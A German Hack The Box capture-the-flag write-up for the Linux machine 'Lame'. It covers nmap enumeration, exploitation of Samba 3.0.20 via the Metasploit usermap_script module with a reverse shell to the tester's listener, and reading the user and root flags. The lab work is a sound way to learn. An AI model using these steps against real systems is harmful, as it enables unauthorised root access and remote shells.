HTB · published
Lame
Hack The Box CPTS-Roadmap Writeup für Lame: Linux-Service-Enumeration, Samba 3.0.20 usermap_script RCE und Root-Shell.
Metadaten
- Name: Lame
- IP Address:
10.129.163.96 - Plattform: Linux
- Kategorie: SMB / Samba / RCE
- Schwierigkeit: Easy
- Ziel(e): User, Root
- Kurzbeschreibung: Lame ist eine Easy-Linux-Maschine und war die erste veröffentlichte Maschine auf Hack The Box. Der Weg ist sehr direkt: Enumeration zeigt eine alte Samba-Version
3.0.20-Debian, die überusermap_scriptausnutzbar ist. Der Exploit liefert direkt eine Root-Shell.
Reconnaissance / Enumeration
Der initiale Full-Port-Scan zeigte fünf offene TCP-Ports:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Der vollständige Scan-Befehl:
nmap -p- --min-rate 10000 -T4 -v -n -oA nmap/initial-scan 10.129.163.96
Service Scan
Der Service-Scan lieferte mehrere klassische alte Linux-Services:
nmap -sC -sV -vvv -p 21,22,139,445,3632 -oA nmap/service_deep 10.129.163.96
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian
3632/tcp open distccd distccd v1 ((GNU) 4.2.4)
Wichtige Beobachtungen:
FTP: Anonymous login allowed
SMB: Samba 3.0.20-Debian
Host: lame
Domain: hackthebox.gr
SMB signing: disabled
SMB2: protocol negotiation failed
Besonders auffällig waren:
vsftpd 2.3.4Samba 3.0.20-Debiandistccd
Alle drei Services sind auf einer alten Linux-Box einen genaueren Blick wert. In diesem Fall war Samba der direkte Weg.
SMB / Samba Findings
Der relevante Service lief auf Port 139 und 445:
Samba smbd 3.0.20-Debian
Diese Version ist anfällig für die bekannte username map script Command Execution. In Metasploit ist der passende Exploit:
multi/samba/usermap_script
Die Schwachstelle erlaubt Command Execution über speziell präparierte SMB-Login-Daten, wenn username map script unsicher verarbeitet wird.
Exploitation: Samba usermap_script
Das Metasploit-Modul wurde mit dem Zielhost und einem Reverse-Netcat-Payload konfiguriert:
msf exploit(multi/samba/usermap_script) > options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.129.163.96 yes The target host(s)
RPORT 139 yes The target port
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.118 yes The listen address
LPORT 4444 yes The listen port
Ausführung:
msf exploit(multi/samba/usermap_script) > run
Ergebnis:
[*] Started reverse TCP handler on 10.10.14.118:4444
[*] Command shell session 1 opened (10.10.14.118:4444 -> 10.129.163.96:45048)
Die Shell wurde anschließend interaktiv gemacht:
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
Der Exploit lieferte direkt Root:
root@lame:/#
Damit waren Foothold und Privilege Escalation in einem Schritt abgeschlossen.
User Flag
Mit Root-Rechten konnte die User-Flag direkt gelesen werden:
cat /home/makis/user.txt
Root Flag
Die Root-Flag lag im Root-Home:
cat /root/root.txt
Post-Exploitation
- Foothold: Samba RCE über
multi/samba/usermap_script. - User: Zugriff auf
/home/makis/user.txt. - Root: Exploit lieferte direkt
root@lame. - Separate Privilege Escalation: Nicht nötig.
- Alternative Angriffsflächen:
vsftpd 2.3.4unddistccdwaren ebenfalls auffällig, wurden aber für den erfolgreichen Weg nicht benötigt.
Lessons Learned
- Versionsnummern ernst nehmen: Alte Services wie Samba
3.0.20-Debiansind oft der wichtigste Hinweis. - Nicht nur Web denken: Lame ist ein gutes Beispiel dafür, dass klassische Netzwerkdienste der direkte Weg sein können.
- SMB sauber enumerieren: Ports
139und445liefern oft Betriebssystem-, Domain- und Versionshinweise. - Metasploit als Validierung: Für bekannte Legacy-Schwachstellen kann Metasploit schnell bestätigen, ob der Weg funktioniert.
- Ein Exploit kann reichen: Bei Lame führt der Samba-Bug direkt zu Root, ohne separate Privilege-Escalation-Phase.
Notizen
Lame ist als CPTS-Roadmap-Maschine besonders gut, um den Blick für alte Services zu schärfen. Der wichtigste Punkt ist nicht die Komplexität des Exploits, sondern das saubere Erkennen der Angriffsfläche: SMB-Version prüfen, bekannte Schwachstelle zuordnen, kontrolliert ausnutzen.